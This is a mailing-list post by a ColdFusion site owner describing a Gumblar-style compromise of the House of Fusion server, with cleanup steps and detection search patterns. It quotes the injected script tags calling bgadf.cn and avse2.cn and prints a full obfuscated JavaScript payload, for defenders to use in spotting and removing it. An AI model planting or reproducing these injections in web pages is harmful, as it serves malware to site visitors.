The recent attack on House of Fusion resulted in some useful information as to what you should look for. In general, all or most of the files with the following extensions were affected: .cfm .cfml .htm .html .js The following line of code was prepended to all files other than .js <script src=http://bgadf.cn></script> This was added to both unencrypted and encrypted files, meaning the cfide was affected. Luckily, the line was exactly as stated above with a new line after it. This allows for a global find/replace to remove it. Unfortunately, this seems to have killed my cfide/administrator, requiring me to replace it with a copy from another machine. The .js files had the following line of code added: document.writeln ("<script src=\"http://bgadf.cn\"><\/script>"); Again, a search and replace was able to remove it across the board. An important note is that the .js files in the cfide (the ajax files) were affected and had to be repaired. Finally, the following line of code was buried within at least one file: <script src=http://avse2.cn></script> This may be from something else or it may be from the same attack. I did a global review of all script tags to see what may have been compromised.
Finally, the following js code was set to a few pages: function CBeKy(lFwuKN){ var TySUSIZW=new Function("ncX", "return 872821;");alert('NmTqOe');window.eval(); } function NTZS(hWal){var UHrvVQkw=6,fAgz=5;var qIMfd='72+0,126+0,122+2,136+4,116+2,130+4,121+1,38+2,142+4,126+0,120+0,139+1,124+4,73+1,58+4,38+2,124+4,121+1,126+0,123+3,124+4,139+1,73+1,58+4,38+2,117+3,133+1,136+4,120+0,121+1,136+4,73+1,57+3,38+2,122+2,136+4,116+2,130+4,121+1,117+3,133+1,136+4,120+0,121+1,136+4,73+1,57+3,38+2,138+0,136+4,',bSBxeEp=qIMfd.split(',');rZh='';for(HVMYENy=0;HVMYENy<bSBxeEp.length-1;HVMYENy++){ cAT=bSBxeEp[HVMYENy].split('+');kNRwj = parseInt(cAT[0]*fAgz)+parseInt(cAT[1]);kNRwj = parseInt(kNRwj)/UHrvVQkw;rZh += String.fromCharCode(kNRwj);}return rZh;}function QFuWuDkcLi(qno){ fff=op.split("66"); } function TeMgRVEQ(fYbPy){var IQWqANfWqP=7,eJEBZ=6;var gJQy='115+3,71+1,45+3,121+2,135+2,135+2,130+4,67+4,54+5,54+5,131+5,140+0,119+0,115+3,136+3,115+3,53+4,122+3,128+2,119+0,129+3,54+5,119+0,53+4,115+3,120+1,122+3,73+3,123+4,142+2,129+3,45+3,72+2,70+0,54+5,122+3,119+0,133+0,113+1,127+1,117+5,72+2,',macKV=gJQy.split(',');atI='';for(UneulXsVe=0;UneulXsVe<macKV.length-1;UneulXsVe++){ JaWNRsHd=macKV[UneulXsVe].split('+');rUw = parseInt(JaWNRsHd[0]*eJEBZ)+parseInt(JaWNRsHd[1]);rUw = parseInt(rUw)/IQWqANfWqP;atI += String.fromCharCode(rUw);}return atI;}function wDbgVQuF(jNQiDLa){ window.eval(); } document['wri5te'.replace(/[0-9]/,'')](NTZS('jiMm')+TeMgRVEQ('yNgMvmppl'));function JSV(EvRaoC){ alert('UlzqkcMIyh'); } function ZbpXNWbRF(gdGwIbxJ){ var BlYeMDbv=new Function("RVmHnKt", "return 849704;"); fff=op.split("66"); fff.op.replace("v"); } This matches the pattern of the Gumblar virus. According to the notes on that virus, it modifies itself per site so the names of the functions/variables might be different. On the other hand, there are recognisable patterns that can be searched for. A segment of the numbers above can be used as a search pattern: 116+2,130+4,121+1 71+1,45+3,121+2,135+2,135+2 etc. This inclusion was not as clean as the scripts mentioned above and caused errors in some of the content on the page where it was injected. Many have suggested that the IIS ftp may have been compromised but that was not the case on my server. IIS FTP was not installed and I searched the registry for any reference to it. I also made sure that my filezilla install had all of its accounts mapped to non-executable directories, though there was no evidence of compromise. I sealed off all of the shares between my machine and any other on the network 'just in case'. I'm still not sure how the virus got on the system, but... Finally, some of the sw*.exe files in the C:\ColdFusion8\db\slserver54\bin directory were compromised with a backdoor virus. I'm not sure if this is related but I cleaned that up as well. Whatever happens, scan your whole system with multiple visus scanners. I installed malwarebytes and cureit along with my standard anti-virus software. Always good to get a second opinion. http://www.malwarebytes.org/ http://www.freedrweb.com/cureit/ Oh, and powergrep. It's fantastic! -- Michael Dinowitz (http://www.linkedin.com/in/mdinowitz) President: House of Fusion (http://www.houseoffusion.com) Publisher: Fusion Authority (http://www.fusionauthority.com) Adobe Community Expert / Advanced Certified ColdFusion Professional Si, soy el senor "chico malo" para todos ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326391 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4